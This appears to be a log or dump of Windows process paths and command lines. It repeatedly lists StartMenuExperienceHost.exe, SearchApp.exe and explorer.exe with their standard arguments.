C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

